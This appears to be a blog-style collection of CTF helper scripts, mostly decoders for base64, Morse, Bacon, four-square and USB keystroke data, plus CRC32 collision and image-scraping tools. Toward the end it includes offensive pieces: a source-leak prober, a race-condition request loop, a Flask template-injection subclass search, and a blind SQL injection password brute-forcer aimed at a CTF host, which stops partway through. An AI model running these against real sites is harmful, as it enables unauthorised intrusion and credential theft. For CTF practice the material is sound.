批处理修改文件后缀名(当前目录下)

1
2
3
4
5
6
7
8
9
10
11
12
##python批量更换后缀名
import os
# 列出当前目录下所有的文件
files = os.listdir('.')
#print('files',files)
for filename in files:
portion = os.path.splitext(filename)
# 如果后缀是.dat
if portion[1] == ".filename":
# 重新组合文件名和后缀名
newname = portion[0] + ".newname"
os.rename(filename,newname)

进制转换解码脚本

1
2
3
4
5
6
7
8
9
10
import chardet

a = b"\345\260\274\345\217\244\346\213\211\346\226\257\350\265\265\345\233\233"
#判断当前字符串的格式(编码类型)
fencoding = chardet.detect(a)

print(fencoding)
#编码类型为打印出来的fencoding编码类型
a = a.decode('utf-8')
print(a)

ascil码转字符串或解base64

1
2
3
4
5
6
7
8
9
# ascil码转字符串或解base64
# import base64
a='102 108 97 103 123 52 55 101 100 98 56 51 48 48 101 100 53 102 57 98 50 56 102 99 53 52 98 48 100 48 57 101 99 100 101 102 55 125'
a=a.split(' ')
flag=''
for i in a:
flag=flag+chr(int(i))
print(flag)
# print flag.decode('base64')

完整base64解码(txt输入输出)

1
2
3
4
5
6
import base64
f = open('out.txt','r')
f1 = open('out1.txt','w')
f1.write(str(base64.b64decode(f.read())))
f.close()
f1.close()

批量crc32碰撞

注释:解压后是68个压缩包,拖进winhex分析,不是伪加密,hint提示是base64,每个文件是4b,所以每个bata.txt应该是4个字符,写脚本进行批量crc32碰撞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#coding:utf-8
import zipfile
import string
import binascii

def CrackCrc(crc):
for a in dic:
for b in dic:
for c in dic:
for d in dic:
s = a + b + c + d
if crc == (binascii.crc32(s) & 0xffffffff):
#print(s)
f.write(s)
return

def CrackZip():
for i in range(68):
file = 'out' + str(i) + '.zip'
f = zipfile.ZipFile(file,'r')
GetCrc = f.getinfo('data.txt')
crc = GetCrc.CRC
CrackCrc(crc)

dic = string.ascii_letters + string.digits + '+/='
#dic = string.printable

f = open('out.txt','w')
CrackZip()
f.close()


批量图片爬取(百度)

需要不同人的需要在脚本目录下新建一个包含关键词的txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
import re
import requests
from urllib import error
from bs4 import BeautifulSoup
import os

num = 0
numPicture = 0
file = ''
List = []


def Find(url):
global List
print('正在检测图片总数,请稍等.....')
t = 0
i = 1
s = 0
while t < 1000:
Url = url + str(t)
try:
Result = requests.get(Url, timeout=7)
except BaseException:
t = t + 60
continue
else:
result = Result.text
pic_url = re.findall('"objURL":"(.*?)",', result, re.S) # 先利用正则表达式找到图片url
s += len(pic_url)
if len(pic_url) == 0:
break
else:
List.append(pic_url)
t = t + 60
return s


def recommend(url):
Re = []
try:
html = requests.get(url)
except error.HTTPError as e:
return
else:
html.encoding = 'utf-8'
bsObj = BeautifulSoup(html.text, 'html.parser')
div = bsObj.find('div', id='topRS')
if div is not None:
listA = div.findAll('a')
for i in listA:
if i is not None:
Re.append(i.get_text())
return Re


def dowmloadPicture(html, keyword):
global num
# t =0
pic_url = re.findall('"objURL":"(.*?)",', html, re.S) # 先利用正则表达式找到图片url
print('找到关键词:' + keyword + '的图片,即将开始下载图片...')
for each in pic_url:
print('正在下载第' + str(num + 1) + '张图片,图片地址:' + str(each))
try:
if each is not None:
pic = requests.get(each, timeout=7)
else:
continue
except BaseException:
print('错误,当前图片无法下载')
continue
else:
string = file + r'\\' + keyword + '_' + str(num) + '.jpg'
fp = open(string, 'wb')
fp.write(pic.content)
fp.close()
num += 1
if num >= numPicture:
return


if __name__ == '__main__': # 主函数入口
word = input("请输入搜索关键词(可以是人名,地名等): ")
#add = 'http://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word=%E5%BC%A0%E5%A4%A9%E7%88%B1&pn=120'
url = 'http://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word=' + word + '&pn='
tot = Find(url)
Recommend = recommend(url) # 记录相关推荐
print('经过检测%s类图片共有%d张' % (word, tot))
numPicture = int(input('请输入想要下载的图片数量 '))
file = input('请建立一个存储图片的文件夹,输入文件夹名称即可')
y = os.path.exists(file)
if y == 1:
print('该文件已存在,请重新输入')
file = input('请建立一个存储图片的文件夹,)输入文件夹名称即可')
os.mkdir(file)
else:
os.mkdir(file)
t = 0
tmp = url
while t < numPicture:
try:
url = tmp + str(t)
result = requests.get(url, timeout=10)
print(url)
except error.HTTPError as e:
print('网络错误,请调整网络后重试')
t = t+60
else:
dowmloadPicture(result.text, word)
t = t + 60

print('当前搜索结束,感谢使用')
print('猜你喜欢')
for re in Recommend:
print(re, end=' ')


统计字符频率

统计一个文件里字符出现的频率

1
2
3
4
5
6
7
8
from collections import Counter

f = open("file.txt")
txt = f.read()
c = Counter()
for i in txt:
c[i] = c[i]+1
print(c)


将十六进制错位转ascil输出

做题时发现的脚本,存一下说不定以后有用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#coding=utf-8
import io
import sys

#改变标准输出的默认编码
#utf-8中文乱码
sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf-8')

s = [0x4c,0xa6,0x49,0x24,0xa5,0x18,0x54,0xa1,
0x8b,0x14,0x80,0xd1,0x49,0x92,0xc4,0x65,
0x45,0x15,0x38,0x62,0x40,0x4d,0x50,0x94,
0x29,0x92,0x84,0x41,0x45,0xc9,0x41,0x35,
0x52,0x5c,0xa6,0x45,0x50,0xa3,0x4a,0x4c,
0x83,0x13]
for i in range(160):
flag=''
for j in range(len(s)):
flag+=chr(s[j]-i)
print(flag)


解摩斯密码

只能输出大写字母,后续再添加功能,更新了所有的符号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# -*- coding: UTF-8 -*-
from __future__ import print_function
a =".-....-.--.---.-.-.-..-......-........-..---..--.-"
s = a.split("/")
dict = {'.-': 'A',
'-...': 'B',
'-.-.': 'C',
'-..':'D',
'.':'E',
'..-.':'F',
'--.': 'G',
'....': 'H',
'..': 'I',
'.---':'J',
'-.-': 'K',
'.-..': 'L',
'--': 'M',
'-.': 'N',
'---': 'O',
'.--.': 'P',
'--.-': 'Q',
'.-.': 'R',
'...': 'S',
'-': 'T',
'..-': 'U',
'...-': 'V',
'.--': 'W',
'-..-': 'X',
'-.--': 'Y',
'--..': 'Z',
'.----': '1',
'..---': '2',
'...--': '3',
'....-': '4',
'.....': '5',
'-....': '6',
'--...': '7',
'---..': '8',
'----.': '9',
'-----': '0',
'.-.-.-': '.',
'..--..': '?',
'-.-.--': '!',
'-..-.': '/',
'.--.-.': '@',
'---...': ':',
'-.--.': '(',
'-.--.-': ')',
'-....-': '-',
'.-.-.-': '.',
'----.--': '{',
'-----.-': '}',
'-....-': '=',
'.----.': '\'',
'..--.-': '_',
'...-..-': '$',
'-.-.-.': ';',
'.-..-.': '"',
'. ...': '&'
};
for item in s:
print (dict[item],end='')
#print (s)


批量替换txt里字符

1
2
3
4
5
6
7
8
9
import os
os.chdir('C:\\Users\\Administrator\\Downloads') # 跳到某盘
if not os.path.exists('as_code.txt'): # 看一下这个文件是否存在
exit(-1) #,不存在就退出
lines = open('as_code.txt').readlines() #打开文件,读入每一行
fp = open('as_code1.txt','w') #打开你要写的文件,不存在则创建
for s in lines:
fp.write( s.replace('s','0').replace('a','1')) # replace是替换,write是写入
fp.close() # 关闭文件

web源码泄露探测

用来探测一些常见的源码泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# -*- coding:utf-8 -*-

import requests
lists = ['/.git/config', '/.svn/entries', 'web.rar', 'www.zip', 'www.rar', 'wwwroot.rar', '1.rar', 'bbs.zip', 'website.rar']
print('- - - - - - - - - - - - - - - - - - - -')
print(u'| 就是个自己用的小脚本 by Damya |')
print('- - - - - - - - - - - - - - - - - - - -')
# 用来输入需要探测的网址
address = input('请输入URL地址:')
# 把列表里的元素一个一个遍历出来
for a in lists:
# 把网址和探测的文件连接到一起
tance = "%s/%s" % (address, a)
# print tance
# 使用 request 模块里的 get 来获取这个网址
qq = requests.get(url=tance)

# 获取响应码并赋值给 dq
dq = qq.status_code
# 判断响应码是否为 200 ,是,就进行下一步
if dq == 200 :
# 输出 响应码和探测地址
print(u"响应码:[%s] - 地址:%s" % (dq, tance))
# 如果响应码不是 200 就进行着一步
else:
# 输入响应码和地址
print(u"响应码:[%s] - 地址:%s" % (dq, tance))


模拟自动刷新脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import time
from selenium import webdriver

def refresh(url,num):
driver = webdriver.Chrome("C:/python27/chromedriver.exe")
driver.get(url)
for i in range(num):
time.sleep(0.001)
driver.refresh()
print('Browser will be close after 600s')
time.sleep(600)
driver.close()

if __name__ == "__main__":
url = input("Please enter the url:\n")
num = int(input("Enter the number of refresh:\n"))
refresh(url,num)

培根密码解密脚本

包含两种解法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
# coding:utf8

import re

alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']

first_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","babaa","babab","babba","babbb","bbaaa","bbaab"]

second_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","baabb","babaa","babab","babba","babbb"]

def encode():
upper_flag = False # 用于判断输入是否为大写
string = raw_input("please input string to encode:\n")
if string.isupper():
upper_flag = True
string = string.lower()
e_string1 = ""
e_string2 = ""
for index in string:
for i in range(0,26):
if index == alphabet[i]:
e_string1 += first_cipher[i]
e_string2 += second_cipher[i]
break
if upper_flag:
e_string1 = e_string1.upper()
e_string2 = e_string2.upper()
print "first encode method result is:\n"+e_string1
print "second encode method result is:\n"+e_string2
return


def decode():
upper_flag = False # 用于判断输入是否为大写
e_string = raw_input("please input string to decode:\n")
if e_string.isupper():
upper_flag = True
e_string = e_string.lower()
e_array = re.findall(".{5}",e_string)
d_string1 = ""
d_string2 = ""
for index in e_array:
for i in range(0,26):
if index == first_cipher[i]:
d_string1 += alphabet[i]
if index == second_cipher[i]:
d_string2 += alphabet[i]
if upper_flag:
d_string1 = d_string1.upper()
d_string2 = d_string2.upper()
print "first decode method result is:\n"+d_string1
print "second decode method result is:\n"+d_string2
return


if __name__ == '__main__':
print "\t\tcoding by qux"
while True:
print "\t*******Bacon Encode_Decode System*******"
print "input should be only lowercase or uppercase,cipher just include a,b(or A,B)"
print "1.encode\n2.decode\n3.exit"
s_number = raw_input("please input number to choose\n")
if s_number == "1":
encode()
raw_input()
elif s_number == "2":
decode()
raw_input()
elif s_number == "3":
break
else:
continue


敲击码转换脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\",  0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }
nums = []
keys = """00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:17:00:00:00:00:00
00:00:17:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0b:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:0c:00:00:00:00:00
00:00:0c:16:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:0c:00:00:00:00:00
20:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:10:00:00:00:00:00
00:00:10:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1c:00:00:00:00:00
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:13:00:00:00:00:00
20:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:1a:00:00:00:00:00
00:00:1a:12:00:00:00:00
00:00:12:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:15:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:07:00:00:00:00:00
00:00:00:00:00:00:00:00
20:00:00:00:00:00:00:00
20:00:1e:00:00:00:00:00
20:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00
00:00:28:00:00:00:00:00
00:00:00:00:00:00:00:00
"""
keys = keys.split("\n")
import sys
import os

DataFileName = "usb.dat"

presses = []

normalKeys = {"04": "a", "05": "b", "06": "c", "07": "d", "08": "e", "09": "f", "0a": "g", "0b": "h", "0c": "i",
"0d": "j", "0e": "k", "0f": "l", "10": "m", "11": "n", "12": "o", "13": "p", "14": "q", "15": "r",
"16": "s", "17": "t", "18": "u", "19": "v", "1a": "w", "1b": "x", "1c": "y", "1d": "z", "1e": "1",
"1f": "2", "20": "3", "21": "4", "22": "5", "23": "6", "24": "7", "25": "8", "26": "9", "27": "0",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "-", "2e": "=", "2f": "[",
"30": "]", "31": "\\", "32": "<NON>", "33": ";", "34": "'", "35": "<GA>", "36": ",", "37": ".", "38": "/",
"39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
"40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

shiftKeys = {"04": "A", "05": "B", "06": "C", "07": "D", "08": "E", "09": "F", "0a": "G", "0b": "H", "0c": "I",
"0d": "J", "0e": "K", "0f": "L", "10": "M", "11": "N", "12": "O", "13": "P", "14": "Q", "15": "R",
"16": "S", "17": "T", "18": "U", "19": "V", "1a": "W", "1b": "X", "1c": "Y", "1d": "Z", "1e": "!",
"1f": "@", "20": "#", "21": "$", "22": "%", "23": "^", "24": "&", "25": "*", "26": "(", "27": ")",
"28": "<RET>", "29": "<ESC>", "2a": "<DEL>", "2b": "\t", "2c": "<SPACE>", "2d": "_", "2e": "+", "2f": "{",
"30": "}", "31": "|", "32": "<NON>", "33": "\"", "34": ":", "35": "<GA>", "36": "<", "37": ">", "38": "?",
"39": "<CAP>", "3a": "<F1>", "3b": "<F2>", "3c": "<F3>", "3d": "<F4>", "3e": "<F5>", "3f": "<F6>",
"40": "<F7>", "41": "<F8>", "42": "<F9>", "43": "<F10>", "44": "<F11>", "45": "<F12>"}

# handle
result = ""
for press in keys:
Bytes = press.split(":")
if Bytes[0] == "00":
if Bytes[2] != "00" and Bytes[3] == "00":
result += normalKeys[Bytes[2]]
elif Bytes[0] == "20": # shift key is pressed.
if Bytes[2] != "00" and Bytes[3] == "00":
result += shiftKeys[Bytes[2]]
else:
print("[-] Unknow Key : %s" % (Bytes[0]))
print("[+] Found : %s" % (result))

web条件竞争脚本

通过不断访问一个文件形成条件竞争,获得flag

1
2
3
4
5
6
import requests
url = 'http://148.70.59.198:42534/uploads/9a155ffc4127de3a9e215a4d6f212d7f414ab49b/0bc87f6e573a0a69bc1a49c448be09b7775399c1'
while 1:
r = requests.get(url)
if 'Syc' in r.text:
print(r.text)


文字识别脚本

做题时收集的文字识别脚本,调用了百度ai

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from aip import AipOcr
import time
import os
#获取开始时间
start = time.time()

""" 你的 APPID AK SK """
APP_ID = ''
API_KEY = ''
SECRET_KEY = ''

client = AipOcr(APP_ID, API_KEY, SECRET_KEY)


""" 读取图片 """
def get_file_content(filePath):
print(filePath)
with open(filePath, 'rb') as fp:
return fp.read()

""" 写入文本 """
def write_on_txt(content,filePath,linefeed = "0"):
"""
content:要写入的内容
filePath:要写入文件的路径
linefeed :判断是否换行
- 1 为不换行
- 其他 为换行
"""
#只需要将之前的”w"改为“a"即可,代表追加内容
with open(filePath,"a") as file:
try:
file.write(content)
except:
print("写入错误")
else:
if linefeed != "1":
file.write("\n")

#图片路径
img_path = r"D:\\ubw (2019-11-2 9-55-43)" # 也可采用 r" D:\Test_path" 或者是"D:/Test_path"
#文本路径
txt_path = r"D:\\ubw (2019-11-2 9-55-43)\\base.txt"

options = {}

#遍历所有文件(使用 os.walk 方法)
for root,dirs,files in os.walk(img_path):
for file in files:
# 使用join函数将文件名称和文件所在根目录连接起来
file_dir = os.path.join(root, file)
print(file_dir)
# write_on_txt("=============================",txt_path,"0")
write_on_txt("文件名:"+ file_dir,txt_path,"0")
#判断是否是图片
if file_dir[-4:]==".png"or file_dir[-4:]==".jpg":
#传入图片
image = get_file_content(file_dir)
""" 调用通用文字识别, 图片参数为本地图片 """
a = client.basicGeneral(image, options)
# 查看返回的结果
# print(a['words_result'])
print()
for dic in a['words_result']:
print(dic['words'])
write_on_txt(dic['words'],txt_path,"0")

end = time.time()
print('Running time: %1.2f Seconds'%(end-start))


解base64图片(PHP脚本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
function imgBase64ToFile()
{

$dir_path = realpath("./") ;
if (!is_dir($dir_path)) {
mkdir($dir_path, 0777);
}
$base64_image_content = '';
if (!$base64_image_content || !$dir_path) {
return FALSE;
}
$result = array();
$new_file = '';
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_image_content, $result)) {
if (!empty($result[2])) {
$type = $result[2];
$new_file = $dir_path . time() . ".{$type}";
file_put_contents($new_file, base64_decode(str_replace($result[1], '', $base64_image_content)));
}
}
print_r($new_file);
echo '<img src=".'.$new_file.'"/>';
}

imgBase64ToFile();
?>

四方解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#coding:utf-8
import collections
import re

matrix = 'ABCDEFGHIJKLMNOPRSTUVWXYZ'
pla = 'abcdefghijklmnoprstuvwxyz'
key1 = '[HELLO]'
key2 = '[WORLD]'
key1 = ''.join(collections.OrderedDict.fromkeys(key1))
key2 = ''.join(collections.OrderedDict.fromkeys(key2))

matrix1 = re.sub('[\[\]]','',key1) + re.sub(key1,'',matrix)
matrix2 = re.sub('[\[\]]','',key2) + re.sub(key2,'',matrix)

matrix_list1 = []
matrix_list2 = []
pla_list = []
for i in range(0,len(matrix1),5):
matrix_list1.append(list(matrix1[i:i+5]))
#print matrix_list1

for i in range(0,len(matrix2),5):
matrix_list2.append(list(matrix2[i:i+5]))
#print matrix_list2

for i in range(0,len(pla),5):
pla_list.append(list(pla[i:i+5]))
#print pla_list

#查询两个密文字母位置
def find_index1(x):
for i in range(len(matrix_list1)):
for j in range(len(matrix_list1[i])):
if matrix_list1[i][j] == x:
return i,j
def find_index2(y):
for k in range(len(matrix_list2)):
for l in range(len(matrix_list2[k])):
if matrix_list2[k][l] == y:
return k,l

def gen_pla(letter):

#两个子母中第一个字母位置
first = find_index1(letter[0])

#两个子母中第二个字母位置
second = find_index2(letter[1])

pla = ''
pla += pla_list[first[0]][second[1]]
pla += pla_list[second[0]][first[1]]

return pla

def main():
cip = 'BLMIMTOWUNCBMD'
pla = ''
for i in range(0,len(cip),2):
pla += gen_pla(cip[i:i+2])
print pla

if __name__ == '__main__':
main()

连续解压压缩包脚本

1
2
3
4
5
import tarfile

for i in range(1000, 0, -1):
tf = tarfile.open(str(i)+".tar")
tf.extractall()

将javascript处理后的编码还原成QR图片脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/env python3
import itertools
from PIL import Image
import io
from pyzbar.pyzbar import decode
b = list(map(int, ''.split(' ')))
png_header = '89504e470d0a1a0a0000000d49484452'
png_header = [png_header[i*2:(i+1)*2] for i in range(len(png_header) // 2)]
png_header = list(map(lambda x: int(x, 16), png_header))
LEN = 16
key = [None for _ in range(LEN)]
shifters = []
for i in range(LEN):
    shifters_i = []
    for shifter in range(10):
        if b[(shifter * LEN) % len(b) + i] == png_header[i]:
            shifters_i.append(shifter)
    shifters.append(shifters_i)
def assemble_png(k):
    result = [0 for _ in range(30000)]
    for i in range(LEN):
        shifter = ord(k[i]) - ord('0')
        for j in range(len(b) // LEN):
            result[(j * LEN) + i] = b[(((j + shifter) * LEN) % len(b)) + i]
    i = len(result) - 1
    while result[i] == 0:
        i -= 1
    result = result[:i + 1]
    return result
valid_keys = []
print('{:<5}{:<20}{}'.format('#', 'Candidate', 'isValid?'))
for i, key_candidate in enumerate(itertools.product(*shifters)):
    key_candidate = ''.join(map(str, key_candidate))
    png_candidate = assemble_png(key_candidate)
    f = io.BytesIO(bytes(png_candidate))
    valid = False
    try:
        pilimage = Image.open(f)
        valid = True
        valid_keys.append(key_candidate)
    except:
        pass
    print('{:<5}{:<20}{}'.format(i, key_candidate, valid))
print
for key in valid_keys:
    f = io.BytesIO(bytes(assemble_png(key)))
    pilimage = Image.open(f)
    decoded = decode(pilimage)[0]
    if 'picoCTF' in str(decoded.data):
        print(str(decoded.data, 'utf-8'))

base64隐写解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
def get_base64_diff_value(s1, s2):
base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
res = 0
for i in xrange(len(s2)):
if s1[i] != s2[i]:
return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
return res


def solve_stego():
with open('3.txt', 'rb') as f:
file_lines = f.readlines()
bin_str = ''
for line in file_lines:
steg_line = line.replace('\n', '')
norm_line = line.replace('\n', '').decode('base64').encode('base64').replace('\n', '')
diff = get_base64_diff_value(steg_line, norm_line)
print diff
pads_num = steg_line.count('=')
if diff:
bin_str += bin(diff)[2:].zfill(pads_num * 2)
else:
bin_str += '0' * pads_num * 2
print goflag(bin_str)


def goflag(bin_str):
res_str = ''
for i in xrange(0, len(bin_str), 8):
res_str += chr(int(bin_str[i:i + 8], 2))
return res_str


if __name__ == '__main__':
solve_stego()

奇怪的TTL密码脚本(63 127 191 255)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
fp = open('t.txt','r')
a = fp.readlines()
p = []
for i in a:
p.append(int(i))
s = ''
for i in p:
if i == 63:
a = '00'
elif i == 127:
a = '01'
elif i == 191:
a = '10'
elif i == 255:
a = '11'
s += a
# print(s)

import binascii
flag = ''
for i in range(0,len(s),8):
flag += chr(int(s[i:i+8],2))
flag = binascii.unhexlify(flag)
wp = open('res.jpg','wb')
wp.write(flag)
wp.close()
#00111111 63
#01111111 127
#10111111 191
#11111111 255

PDF爆破hash密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2019/5/1 11:19
# @Author : wulasite
# @Email : wulasite@gmail.com
# @File : readpdf.py
# @Software: PyCharm

from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
import os
import re
from hashlib import sha1
import hashlib



def get_pdf():
return [i for i in os.listdir("./") if i.endswith("pdf")]


def convert_pdf_2_text(path):
with open(path, 'rb') as fp:
# 用文件对象来创建一个pdf文档分析器
praser = PDFParser(fp)
# 创建一个PDF文档
doc = PDFDocument()
# 连接分析器 与文档对象
praser.set_document(doc)
doc.set_parser(praser)

# 提供初始化密码
# 如果没有密码 就创建一个空的字符串
doc.initialize()

# 检测文档是否提供txt转换,不提供就忽略
if not doc.is_extractable:
raise PDFTextExtractionNotAllowed
else:
# 创建PDf 资源管理器 来管理共享资源
rsrcmgr = PDFResourceManager()
# 创建一个PDF设备对象
laparams = LAParams()
device = PDFPageAggregator(rsrcmgr, laparams=laparams)
# 创建一个PDF解释器对象
interpreter = PDFPageInterpreter(rsrcmgr, device)

res = ''
# 循环遍历列表,每次处理一个page的内容
for page in doc.get_pages():
interpreter.process_page(page)
# 接受该页面的LTPage对象
layout = device.get_result()
# 这里layout是一个LTPage对象 里面存放着 这个page解析出的各种对象 一般包括LTTextBox, LTFigure, LTImage, LTTextBoxHorizontal 等等 想要获取文本就获得对象的text属性,
for x in layout:
if isinstance(x, LTTextBoxHorizontal):
res += x.get_text().strip()
# print(res)
return res


def find_password():
pdf_path = get_pdf()

for i in pdf_path:
print("Searching word in " + i)
pdf_text = convert_pdf_2_text('./'+i)
# 这里的分隔符用空格和回车就够了,主要是分割出单词
pdf_text = re.split(' | \n', pdf_text)
for word in pdf_text:
print(word)
enc_word = (word + 'Salz!').encode("utf-8")
sha1_password = hashlib.sha1(enc_word).hexdigest()
if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
print("Find the password :" + word)
exit()

if __name__ == '__main__':
find_password()

flask模板注入

检测有哪些含有os模板的模块可以用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/env python
# encoding: utf-8
num=0
for a in ''.__class__.__mro__.__subclasses__():
if a.__name__ == 'catch_warnings':
try:
for b in a.__init__.__globals__.values():
if b.__class__ == {}.__class__:
if 'eval' in b.keys():
print num,item
num+=1
except:
print '-'
num+=1


base家族解密脚本(85\16\32\64)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import base64 

find_decode = lambda d , data : eval(f'base64.{d}({data})')
def decode(data):
for i in dir(base64):
if i[3:] == 'decode':
try:
decode_data = find_decode(i,data)
chars = decode_data if all(chr(x).isalpha() or chr(x).isspace() for x in decode_data)else None
if chars != None :
return f'Decoded String is: {chars.decode("utf-8")}\nEncrypet was used is: {i[:3]}'
except:
pass

#_______________ Test _________________

print(decode(b'NM&qnZy;B1a%^M')) #output : Hello World , b85
print(decode(b'48656C6C6F20576F726C64'))#output : Hello World , b16
print(decode(b'SGVsbG8gV29ybGQ='))#output : Hello World , b64
print(decode(b'JBSWY3DPEBLW64TMMQ======'))#output : Hello World , b32

盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
url = "http://111.198.29.45:42192/zhuanxvlogin"
# url = "http://localhost:9090/zhuanxvlogin"
def first():
admin_password = ""
for i in range(1,9):
for n in range(30,140):
guess = chr(n)
if guess == "_" or guess == "%":
continue
username = "aaa'\nor\n(select\nsubstring(password,"+str(i)+",1)\nfrom\nUser\nwhere\nname\nlike\n'homamamama')\nlike\n'"+guess+"'\nor\n''like'"
data = {"user.name": username, "user.password": "a"}
req = requests.post(url, data=data, timeout=1000).text
if len(req)>5000:
admin_password = admin_password + guess
print "admin password: "+ admin_password
break
return admin_password
def second(admin_password):
flag = ""
for i in range(1,50):
for n in range(30,140):
guess = chr(n)
if guess == "_" or guess == "%":
continue
